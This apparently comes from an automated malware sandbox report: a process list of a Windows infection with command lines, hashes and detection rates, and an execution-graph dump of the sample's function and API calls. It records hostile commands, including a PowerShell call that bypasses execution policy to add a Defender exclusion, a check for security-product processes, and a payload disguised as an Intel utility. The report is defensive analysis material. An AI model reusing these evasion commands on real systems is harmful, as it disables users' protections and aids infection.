                                                                                                                                                                                                                                                Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                                                                                Imagebase:0x7ff653660000
                                                                                                                                                                                                                                                File size:22'528 bytes
                                                                                                                                                                                                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                                                                Start time:17:14:16
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6e03a0000
                                                                                                                                                                                                                                                File size:1'827'328 bytes
                                                                                                                                                                                                                                                MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                                                                Start time:17:14:16
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                                Imagebase:0xc60000
                                                                                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                                                                Start time:17:14:16
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                Imagebase:0xcf0000
                                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:50
                                                                                                                                                                                                                                                Start time:17:14:17
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
                                                                                                                                                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:51
                                                                                                                                                                                                                                                Start time:17:14:17
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                                                                Start time:17:14:21
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe"
                                                                                                                                                                                                                                                Imagebase:0xad0000
                                                                                                                                                                                                                                                File size:1'863'680 bytes
                                                                                                                                                                                                                                                MD5 hash:27C1F96D7E1B72B6817B6EFEFF037F90
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:3.1%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:2.7%
                                                                                                                                                                                                                                                  Total number of Nodes:765
                                                                                                                                                                                                                                                  Total number of Limit Nodes:16
                                                                                                                                                                                                                                                  execution_graph 13525 e79ba5 13526 e79ba7 13525->13526 13527 e75c10 6 API calls 13526->13527 13528 e79cb1 13527->13528 13529 e78b30 6 API calls 13528->13529 13530 e79cc2 13529->13530 12967 ea6629 12968 ea64c7 __fassign 3 API calls 12967->12968 12969 ea663a 12968->12969 12974 e7b1a0 12975 e7b1f2 12974->12975 12976 e7b3ad CoInitialize 12975->12976 12977 e7b3fa shared_ptr std::future_error::future_error 12976->12977 13113 e720a0 13114 e8c68b __Mtx_init_in_situ 2 API calls 13113->13114 13115 e720ac 13114->13115 13281 e74120 13282 e7416a 13281->13282 13284 e741b2 Concurrency::details::_ContextCallback::_CallInContext std::future_error::future_error 13282->13284 13285 e73ee0 13282->13285 13286 e73f48 13285->13286 13288 e73f1e 13285->13288 13289 e73f58 13286->13289 13291 e72c00 13286->13291 13288->13284 13289->13284 13292 e72c0e 13291->13292 13298 e8b847 13292->13298 13294 e72c42 13295 e72c49 13294->13295 13304 e72c80 13294->13304 13295->13284 13297 e72c58 Concurrency::cancel_current_task 13299 e8b854 13298->13299 13303 e8b873 Concurrency::details::_Reschedule_chore 13298->13303 13307 e8cb77 13299->13307 13301 e8b864 13301->13303 13309 e8b81e 13301->13309 13303->13294 13315 e8b7fb 13304->13315 13306 e72cb2 shared_ptr 13306->13297 13308 e8cb92 CreateThreadpoolWork 13307->13308 13308->13301 13310 e8b827 Concurrency::details::_Reschedule_chore 13309->13310 13313 e8cdcc 13310->13313 13312 e8b841 13312->13303 13314 e8cde1 TpPostWork 13313->13314 13314->13312 13316 e8b817 13315->13316 13317 e8b807 13315->13317 13316->13306 13317->13316 13319 e8ca78 13317->13319 13320 e8ca8d TpReleaseWork 13319->13320 13320->13316 13403 e73fe0 13404 e74022 13403->13404 13405 e740d2 13404->13405 13406 e7408c 13404->13406 13409 e74035 std::future_error::future_error 13404->13409 13407 e73ee0 3 API calls 13405->13407 13410 e735e0 13406->13410 13407->13409 13411 e73616 13410->13411 13415 e7364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 13411->13415 13416 e72ce0 13411->13416 13413 e7369e 13414 e72c00 3 API calls 13413->13414 13413->13415 13414->13415 13415->13409 13417 e72d1d 13416->13417 13418 e8bedf InitOnceExecuteOnce 13417->13418 13419 e72d46 13418->13419 13420 e72d51 std::future_error::future_error 13419->13420 13421 e72d88 13419->13421 13425 e8bef7 13419->13425 13420->13413 13423 e72440 4 API calls 13421->13423 13424 e72d9b 13423->13424 13424->13413 13426 e8bf03 Concurrency::cancel_current_task 13425->13426 13427 e8bf6a 13426->13427 13428 e8bf73 13426->13428 13432 e8be7f 13427->13432 13430 e72ae0 5 API calls 13428->13430 13431 e8bf6f 13430->13431 13431->13421 13433 e8cc31 InitOnceExecuteOnce 13432->13433 13435 e8be97 13433->13435 13434 e8be9e 13434->13431 13435->13434 13436 ea6cbb 4 API calls 13435->13436 13437 e8bea7 13436->13437 13437->13431 13619 e7af20 13620 e7af63 13619->13620 13631 ea6660 13620->13631 13625 ea663f 4 API calls 13626 e7af80 13625->13626 13627 ea663f 4 API calls 13626->13627 13628 e7af98 __cftof 13627->13628 13637 e755f0 13628->13637 13630 e7b04e shared_ptr std::future_error::future_error 13632 eaa671 __fassign 4 API calls 13631->13632 13633 e7af69 13632->13633 13634 ea663f 13633->13634 13635 eaa671 __fassign 4 API calls 13634->13635 13636 e7af71 13635->13636 13636->13625 13638 e75610 13637->13638 13640 e75710 std::future_error::future_error 13638->13640 13641 e722c0 13638->13641 13640->13630 13644 e72280 13641->13644 13645 e72296 13644->13645 13648 ea87f8 13645->13648 13651 ea7609 13648->13651 13650 e722a4 13650->13638 13652 ea7649 13651->13652 13655 ea7631 __cftof std::future_error::future_error 13651->13655 13653 ea690a __fassign 4 API calls 13652->13653 13652->13655 13654 ea7661 13653->13654 13657 ea7bc4 13654->13657 13655->13650 13659 ea7bd5 13657->13659 13658 ea7be4 __cftof 13658->13655 13659->13658 13664 ea8168 13659->13664 13669 ea7dc2 13659->13669 13674 ea7de8 13659->13674 13684 ea7f36 13659->13684 13665 ea8178 13664->13665 13666 ea8171 13664->13666 13665->13659 13693 ea7b50 13666->13693 13668 ea8177 13668->13659 13670 ea7dcb 13669->13670 13672 ea7dd2 13669->13672 13671 ea7b50 4 API calls 13670->13671 13673 ea7dd1 13671->13673 13672->13659 13673->13659 13675 ea7def 13674->13675 13676 ea7e09 __cftof 13674->13676 13675->13676 13678 ea7fa2 13675->13678 13679 ea7f69 13675->13679 13682 ea7f77 13675->13682 13676->13659 13683 ea7f8b 13678->13683 13697 ea8390 13678->13697 13679->13682 13679->13683 13701 ea8241 13679->13701 13682->13683 13705 ea86ea 13682->13705 13683->13659 13685 ea7f4f 13684->13685 13686 ea7f69 13684->13686 13685->13686 13687 ea7fa2 13685->13687 13691 ea7f77 13685->13691 13688 ea8241 4 API calls 13686->13688 13686->13691 13692 ea7f8b 13686->13692 13689 ea8390 4 API calls 13687->13689 13687->13692 13688->13691 13689->13691 13690 ea86ea 4 API calls 13690->13692 13691->13690 13691->13692 13692->13659 13694 ea7b62 13693->13694 13695 ea8ab6 4 API calls 13694->13695 13696 ea7b85 13695->13696 13696->13668 13699 ea83ab 13697->13699 13698 ea83dd 13698->13682 13699->13698 13709 eac88e 13699->13709 13702 ea825a 13701->13702 13716 ead3c8 13702->13716 13704 ea830d 13704->13682 13704->13704 13706 ea8707 13705->13706 13707 ea875d std::future_error::future_error 13705->13707 13706->13707 13708 eac88e __cftof 4 API calls 13706->13708 13707->13683 13708->13706 13712 eac733 13709->13712 13711 eac8a6 13711->13698 13713 eac743 13712->13713 13714 eac748 __cftof 13713->13714 13715 ea690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 13713->13715 13714->13711 13715->13714 13719 ead3ee 13716->13719 13728 ead3d8 __cftof 13716->13728 13717 ead485 13721 ead4ae 13717->13721 13722 ead4e4 13717->13722 13718 ead48a 13729 eacbdf 13718->13729 13719->13717 13719->13718 13719->13728 13723 ead4cc 13721->13723 13724 ead4b3 13721->13724 13746 eacef8 13722->13746 13742 ead0e2 13723->13742 13735 ead23e 13724->13735 13728->13704 13730 eacbf1 13729->13730 13731 ea690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 13730->13731 13732 eacc05 13731->13732 13733 eacef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13732->13733 13734 eacc0d __alldvrm __cftof _strrchr 13732->13734 13733->13734 13734->13728 13736 ead26c 13735->13736 13737 ead2a5 13736->13737 13738 ead2de 13736->13738 13739 ead2b7 13736->13739 13737->13728 13740 eacf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13738->13740 13741 ead16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13739->13741 13740->13737 13741->13737 13743 ead10f 13742->13743 13744 ead14e 13743->13744 13745 ead16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13743->13745 13744->13728 13745->13744 13747 eacf10 13746->13747 13748 eacf75 13747->13748 13749 eacf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13747->13749 13748->13728 13749->13748 13388 e74276 13389 e72410 5 API calls 13388->13389 13390 e7427f 13389->13390 13227 e7a9f4 13236 e79230 13227->13236 13229 e7aa03 shared_ptr 13230 e75c10 6 API calls 13229->13230 13235 e7aab3 shared_ptr std::future_error::future_error 13229->13235 13231 e7aa65 13230->13231 13232 e75c10 6 API calls 13231->13232 13233 e7aa8d 13232->13233 13234 e75c10 6 API calls 13233->13234 13234->13235 13239 e79284 shared_ptr 13236->13239 13237 e75c10 6 API calls 13237->13239 13238 e79543 shared_ptr std::future_error::future_error 13238->13229 13239->13237 13244 e7944f shared_ptr 13239->13244 13240 e75c10 6 API calls 13240->13244 13241 e798b5 shared_ptr std::future_error::future_error 13241->13229 13242 e7979f shared_ptr 13242->13241 13243 e75c10 6 API calls 13242->13243 13245 e79927 shared_ptr std::future_error::future_error 13243->13245 13244->13238 13244->13240 13244->13242 13245->13229 12970 e787b2 12971 e787b6 12970->12971 12972 e787b8 GetFileAttributesA 12970->12972 12971->12972 12973 e787c4 12972->12973 13255 e72170 13258 e8c6fc 13255->13258 13257 e7217a 13259 e8c70c 13258->13259 13261 e8c724 13258->13261 13259->13261 13262 e8cfbe 13259->13262 13261->13257 13263 e8ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 13262->13263 13264 e8cfd0 13263->13264 13264->13259 13265 e7ad70 13266 e7aec0 shared_ptr std::future_error::future_error 13265->13266 13268 e7addc shared_ptr 13265->13268 13268->13266 13269 ea8ab6 13268->13269 13270 ea8ad1 13269->13270 13271 ea8868 4 API calls 13270->13271 13272 ea8adb 13271->13272 13272->13268 13324 e78d30 13325 e78d7f 13324->13325 13326 e75c10 6 API calls 13325->13326 13327 e78d9a shared_ptr std::future_error::future_error 13326->13327 13354 e742b0 13357 e73ac0 13354->13357 13356 e742bb shared_ptr 13358 e73af9 13357->13358 13360 e732d0 6 API calls 13358->13360 13362 e73c38 13358->13362 13363 e73b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 13358->13363 13359 e732d0 6 API calls 13364 e73c5f 13359->13364 13360->13362 13361 e73c68 13361->13356 13362->13359 13362->13364 13363->13356 13364->13361 13365 e73810 4 API calls 13364->13365 13366 e73cdb 13365->13366 13531 e777b0 13532 e777f1 shared_ptr 13531->13532 13533 e75c10 6 API calls 13532->13533 13534 e77883 shared_ptr 13532->13534 13533->13534 13535 e75c10 6 API calls 13534->13535 13536 e77953 shared_ptr std::future_error::future_error 13534->13536 13537 e779e3 13535->13537 13538 e75c10 6 API calls 13537->13538 13539 e77a15 shared_ptr 13538->13539 13540 e75c10 6 API calls 13539->13540 13545 e77aa5 shared_ptr std::future_error::future_error 13539->13545 13541 e77b7d 13540->13541 13542 e75c10 6 API calls 13541->13542 13543 e77ba0 13542->13543 13544 e75c10 6 API calls 13543->13544 13544->13545 13546 e787b0 13547 e787b6 13546->13547 13548 e787b8 GetFileAttributesA 13546->13548 13547->13548 13549 e787c4 13548->13549 13550 e847b0 13552 e84eed 13550->13552 13551 e84f59 shared_ptr std::future_error::future_error 13552->13551 13553 e77d30 7 API calls 13552->13553 13554 e850ed 13553->13554 13589 e78380 13554->13589 13556 e85106 13557 e75c10 6 API calls 13556->13557 13558 e85155 13557->13558 13559 e75c10 6 API calls 13558->13559 13560 e85171 13559->13560 13595 e79a00 13560->13595 13590 e783e5 __cftof 13589->13590 13591 e75c10 6 API calls 13590->13591 13594 e78403 shared_ptr std::future_error::future_error 13590->13594 13592 e78427 13591->13592 13593 e75c10 6 API calls 13592->13593 13593->13594 13594->13556 13596 e79a3f 13595->13596 13597 e75c10 6 API calls 13596->13597 13598 e79a47 13597->13598 13599 e78b30 6 API calls 13598->13599 13600 e79a58 13599->13600 13371 e79ab8 13373 e79acc 13371->13373 13374 e79b08 13373->13374 13375 e75c10 6 API calls 13374->13375 13376 e79b7c 13375->13376 13377 e78b30 6 API calls 13376->13377 13378 e79b8d 13377->13378 13379 e75c10 6 API calls 13378->13379 13380 e79cb1 13379->13380 13381 e78b30 6 API calls 13380->13381 13382 e79cc2 13381->13382 13187 e73c47 13188 e73c51 13187->13188 13189 e73c5f 13188->13189 13194 e732d0 13188->13194 13190 e73c68 13189->13190 13192 e73810 4 API calls 13189->13192 13193 e73cdb 13192->13193 13195 e8c6ac GetSystemTimePreciseAsFileTime 13194->13195 13201 e73314 13195->13201 13196 e7336b 13197 e8c26a 5 API calls 13196->13197 13199 e7333c __Mtx_unlock 13197->13199 13200 e8c26a 5 API calls 13199->13200 13202 e73350 std::future_error::future_error 13199->13202 13203 e73377 13200->13203 13201->13196 13201->13199 13213 e8bd4c 13201->13213 13202->13189 13204 e8c6ac GetSystemTimePreciseAsFileTime 13203->13204 13205 e733af 13204->13205 13206 e8c26a 5 API calls 13205->13206 13207 e733b6 __Cnd_broadcast 13205->13207 13206->13207 13208 e8c26a 5 API calls 13207->13208 13209 e733d7 __Mtx_unlock 13207->13209 13208->13209 13210 e8c26a 5 API calls 13209->13210 13211 e733eb 13209->13211 13212 e7340e 13210->13212 13211->13189 13212->13189 13216 e8bb72 13213->13216 13215 e8bd5c 13215->13201 13217 e8bb9c 13216->13217 13218 e8cf6b _xtime_get GetSystemTimePreciseAsFileTime 13217->13218 13221 e8bba4 __Xtime_diff_to_millis2 std::future_error::future_error 13217->13221 13219 e8bbcf __Xtime_diff_to_millis2 13218->13219 13220 e8cf6b _xtime_get GetSystemTimePreciseAsFileTime 13219->13220 13219->13221 13220->13221 13221->13215 13609 e79f44 13610 e79f4c shared_ptr 13609->13610 13611 e7a953 Sleep CreateMutexA 13610->13611 13613 e7a01f shared_ptr 13610->13613 13612 e7a98e 13611->13612 12978 e78780 12979 e78786 12978->12979 12985 ea6729 12979->12985 12982 e787a6 12984 e787a0 12992 ea6672 12985->12992 12987 e78793 12987->12982 12988 ea67b7 12987->12988 12989 ea67c3 __fassign 12988->12989 12991 ea67cd __cftof 12989->12991 13004 ea6740 12989->13004 12991->12984 12993 ea667e __fassign 12992->12993 12995 ea6685 __cftof 12993->12995 12996 eaa8c3 12993->12996 12995->12987 12997 eaa8cf __fassign 12996->12997 13000 eaa967 12997->13000 12999 eaa8ea 12999->12995 13002 eaa98a 13000->13002 13001 ead82f __fassign RtlAllocateHeap 13003 eaa9d0 ___free_lconv_mon 13001->13003 13002->13001 13002->13002 13002->13003 13003->12999 13005 ea6762 13004->13005 13007 ea674d __cftof ___free_lconv_mon 13004->13007 13005->13007 13008 eaa038 13005->13008 13007->12991 13009 eaa075 13008->13009 13010 eaa050 13008->13010 13009->13007 13010->13009 13012 eb0439 13010->13012 13014 eb0445 __fassign 13012->13014 13013 eb044d __cftof __dosmaperr 13013->13009 13014->13013 13016 eb052b 13014->13016 13017 eb054d 13016->13017 13021 eb0551 __cftof __dosmaperr 13016->13021 13017->13021 13022 eb00d2 13017->13022 13021->13013 13024 eb00e3 13022->13024 13023 eb0106 13023->13021 13026 eafcc0 13023->13026 13024->13023 13025 eaa671 __fassign 4 API calls 13024->13025 13025->13023 13027 eafd0d 13026->13027 13028 ea690a __fassign 4 API calls 13027->13028 13032 eafd1c __cftof __fassign 13028->13032 13029 eab67d 4 API calls 13029->13032 13030 eac719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 13030->13032 13031 eaffbc std::future_error::future_error 13031->13021 13032->13029 13032->13030 13032->13031 13032->13032 13037 e720c0 13040 e8c68b 13037->13040 13039 e720cc 13043 e8c3d5 13040->13043 13042 e8c69b 13042->13039 13044 e8c3eb 13043->13044 13045 e8c3e1 13043->13045 13044->13042 13046 e8c3be 13045->13046 13047 e8c39e 13045->13047 13056 e8cd0a 13046->13056 13047->13044 13052 e8ccd5 13047->13052 13050 e8c3d0 13050->13042 13053 e8c3b7 13052->13053 13054 e8cce3 InitializeCriticalSectionEx 13052->13054 13053->13042 13054->13053 13057 e8cd1f RtlInitializeConditionVariable 13056->13057 13057->13050 13058 e7e0c0 recv 13059 e7e122 recv 13058->13059 13060 e7e157 recv 13059->13060 13061 e7e191 13060->13061 13062 e7e2b3 std::future_error::future_error 13061->13062 13067 e8c6ac 13061->13067 13074 e8c452 13067->13074 13069 e7e2ee 13070 e8c26a 13069->13070 13071 e8c292 13070->13071 13072 e8c274 13070->13072 13071->13071 13072->13071 13091 e8c297 13072->13091 13075 e8c4a8 13074->13075 13077 e8c47a std::future_error::future_error 13074->13077 13075->13077 13080 e8cf6b 13075->13080 13077->13069 13078 e8c4fd __Xtime_diff_to_millis2 13078->13077 13079 e8cf6b _xtime_get GetSystemTimePreciseAsFileTime 13078->13079 13079->13078 13081 e8cf87 __aulldvrm 13080->13081 13082 e8cf7a 13080->13082 13081->13078 13082->13081 13084 e8cf44 13082->13084 13087 e8cbea 13084->13087 13088 e8cbfb GetSystemTimePreciseAsFileTime 13087->13088 13089 e8cc07 13087->13089 13088->13089 13089->13081 13094 e72ae0 13091->13094 13093 e8c2ae Concurrency::cancel_current_task 13102 e8bedf 13094->13102 13096 e72aff 13096->13093 13097 e72af4 __fassign 13097->13096 13098 eaa671 __fassign 4 API calls 13097->13098 13099 ea6ccc 13098->13099 13100 ea8bec __fassign 4 API calls 13099->13100 13101 ea6cf6 13100->13101 13105 e8cc31 13102->13105 13106 e8cc3f InitOnceExecuteOnce 13105->13106 13107 e8bef2 13105->13107 13106->13107 13107->13097 13251 e78980 13253 e78aea 13251->13253 13254 e789d8 shared_ptr 13251->13254 13252 e75c10 6 API calls 13252->13254 13254->13252 13254->13253 13399 e72e00 13400 e72e28 13399->13400 13401 e8c68b __Mtx_init_in_situ 2 API calls 13400->13401 13402 e72e33 13401->13402 13116 e73c8e 13117 e73c98 13116->13117 13119 e73ca5 13117->13119 13124 e72410 13117->13124 13120 e73ccf 13119->13120 13128 e73810 13119->13128 13122 e73810 4 API calls 13120->13122 13123 e73cdb 13122->13123 13125 e72424 13124->13125 13132 e8b52d 13125->13132 13129 e7381c 13128->13129 13174 e72440 13129->13174 13140 ea3aed 13132->13140 13134 e7242a 13134->13119 13135 e8b5a5 ___std_exception_copy 13147 e8b1ad 13135->13147 13136 e8b598 13143 e8af56 13136->13143 13151 ea4f29 13140->13151 13142 e8b555 13142->13134 13142->13135 13142->13136 13144 e8af9f ___std_exception_copy 13143->13144 13146 e8afb2 shared_ptr 13144->13146 13157 e8b39f 13144->13157 13146->13134 13148 e8b1d8 13147->13148 13150 e8b1e1 shared_ptr 13147->13150 13149 e8b39f 5 API calls 13148->13149 13149->13150 13150->13134 13152 ea4f2e __fassign 13151->13152 13152->13142 13153 ead634 __fassign 4 API calls 13152->13153 13156 ea8bfc __cftof 13152->13156 13153->13156 13154 ea65ed __fassign 3 API calls 13155 ea8c2f 13154->13155 13156->13154 13158 e8bedf InitOnceExecuteOnce 13157->13158 13159 e8b3e1 13158->13159 13160 e8b3e8 13159->13160 13168 ea6cbb 13159->13168 13160->13146 13169 ea6cc7 __fassign 13168->13169 13170 eaa671 __fassign 4 API calls 13169->13170 13171 ea6ccc 13170->13171 13172 ea8bec __fassign 4 API calls 13171->13172 13173 ea6cf6 13172->13173 13177 e8b5d6 13174->13177 13176 e72472 13179 e8b5f1 Concurrency::cancel_current_task 13177->13179 13178 ea8bec __fassign 4 API calls 13180 e8b69f 13178->13180 13179->13178 13181 e8b658 __fassign std::future_error::future_error 13179->13181 13181->13176 13391 ea6a44 13392 ea6a5c 13391->13392 13393 ea6a52 13391->13393 13396 ea698d 13392->13396 13395 ea6a76 ___free_lconv_mon 13397 ea690a __fassign 4 API calls 13396->13397 13398 ea699f 13397->13398 13398->13395 13109 e8d0c7 13110 e8d0d7 13109->13110 13111 e8d17f 13110->13111 13112 e8d17b RtlWakeAllConditionVariable 13110->13112 12767 e7a856 12768 e7a870 12767->12768 12769 e7a892 shared_ptr 12767->12769 12768->12769 12770 e7a94e 12768->12770 12774 e7a8a0 12769->12774 12783 e77d30 12769->12783 12772 e7a953 Sleep CreateMutexA 12770->12772 12775 e7a98e 12772->12775 12773 e7a8ae 12773->12774 12776 e77d30 7 API calls 12773->12776 12777 e7a8b8 12776->12777 12777->12774 12778 e77d30 7 API calls 12777->12778 12779 e7a8c2 12778->12779 12779->12774 12780 e77d30 7 API calls 12779->12780 12781 e7a8cc 12780->12781 12781->12774 12782 e77d30 7 API calls 12781->12782 12782->12774 12784 e77d96 __cftof 12783->12784 12821 e77ee8 shared_ptr std::future_error::future_error 12784->12821 12822 e75c10 12784->12822 12786 e77dd2 12787 e75c10 6 API calls 12786->12787 12788 e77dff shared_ptr 12787->12788 12789 e77ed3 GetNativeSystemInfo 12788->12789 12790 e77ed7 12788->12790 12788->12821 12789->12790 12791 e77f3f 12790->12791 12792 e78019 12790->12792 12790->12821 12793 e75c10 6 API calls 12791->12793 12794 e75c10 6 API calls 12792->12794 12795 e77f67 12793->12795 12796 e7804c 12794->12796 12797 e75c10 6 API calls 12795->12797 12798 e75c10 6 API calls 12796->12798 12799 e77f86 12797->12799 12800 e7806b 12798->12800 12832 ea8bbe 12799->12832 12802 e75c10 6 API calls 12800->12802 12803 e780a3 12802->12803 12804 e75c10 6 API calls 12803->12804 12805 e780f4 12804->12805 12806 e75c10 6 API calls 12805->12806 12807 e78113 12806->12807 12808 e75c10 6 API calls 12807->12808 12809 e7814b 12808->12809 12810 e75c10 6 API calls 12809->12810 12811 e7819c 12810->12811 12812 e75c10 6 API calls 12811->12812 12813 e781bb 12812->12813 12814 e75c10 6 API calls 12813->12814 12815 e781f3 12814->12815 12816 e75c10 6 API calls 12815->12816 12817 e78244 12816->12817 12818 e75c10 6 API calls 12817->12818 12819 e78263 12818->12819 12820 e75c10 6 API calls 12819->12820 12820->12821 12821->12773 12823 e75c54 12822->12823 12835 e74b30 12823->12835 12825 e75d17 shared_ptr std::future_error::future_error 12825->12786 12826 e75c7b __cftof 12826->12825 12827 e75da7 RegOpenKeyExA 12826->12827 12828 e75e00 RegCloseKey 12827->12828 12830 e75e26 12828->12830 12829 e75ea6 shared_ptr std::future_error::future_error 12829->12786 12830->12829 12831 e75c10 4 API calls 12830->12831 12961 ea8868 12832->12961 12834 ea8bdc 12834->12821 12836 e74b92 12835->12836 12838 e74ce5 12835->12838 12836->12838 12839 ea6da6 12836->12839 12838->12826 12840 ea6dc2 __fassign 12839->12840 12841 ea6db4 12839->12841 12840->12836 12844 ea6d19 12841->12844 12849 ea690a 12844->12849 12848 ea6d3d 12848->12836 12850 ea692a 12849->12850 12851 ea6921 12849->12851 12850->12851 12863 eaa671 12850->12863 12857 ea6d52 12851->12857 12858 ea6d8f 12857->12858 12860 ea6d5f 12857->12860 12953 eab67d 12858->12953 12861 ea6d6e __fassign 12860->12861 12948 eab6a1 12860->12948 12861->12848 12864 eaa67b __fassign 12863->12864 12866 eaa694 __fassign ___free_lconv_mon 12864->12866 12878 ead82f 12864->12878 12867 ea694a 12866->12867 12882 ea8bec 12866->12882 12870 eab5fb 12867->12870 12871 eab60e 12870->12871 12872 ea6960 12870->12872 12871->12872 12913 eaf5ab 12871->12913 12874 eab628 12872->12874 12875 eab63b 12874->12875 12876 eab650 12874->12876 12875->12876 12920 eae6b1 12875->12920 12876->12851 12881 ead83c __fassign 12878->12881 12879 ead867 RtlAllocateHeap 12880 ead87a 12879->12880 12879->12881 12880->12866 12881->12879 12881->12880 12883 ea8bf1 __fassign 12882->12883 12887 ea8bfc __cftof 12883->12887 12888 ead634 12883->12888 12902 ea65ed 12887->12902 12890 ead640 __fassign 12888->12890 12889 ead69c __cftof 12889->12887 12890->12889 12891 ead81b __fassign 12890->12891 12892 ead726 12890->12892 12899 ead751 __fassign 12890->12899 12893 ea65ed __fassign 3 API calls 12891->12893 12892->12899 12905 ead62b 12892->12905 12894 ead82e 12893->12894 12896 eaa671 __fassign 4 API calls 12900 ead7a5 12896->12900 12898 ead62b __fassign 4 API calls 12898->12899 12899->12889 12899->12896 12899->12900 12900->12889 12901 eaa671 __fassign 4 API calls 12900->12901 12901->12889 12908 ea64c7 12902->12908 12906 eaa671 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12905->12906 12907 ead630 12906->12907 12907->12898 12909 ea64d5 __fassign 12908->12909 12910 ea6520 12909->12910 12911 ea652b __fassign GetPEB ExitProcess GetPEB 12909->12911 12912 ea652a 12911->12912 12914 eaf5b7 __fassign 12913->12914 12915 eaa671 __fassign 4 API calls 12914->12915 12917 eaf5c0 __fassign 12915->12917 12916 eaf606 12916->12872 12917->12916 12918 ea8bec __fassign 4 API calls 12917->12918 12919 eaf62b 12918->12919 12921 eaa671 __fassign 4 API calls 12920->12921 12922 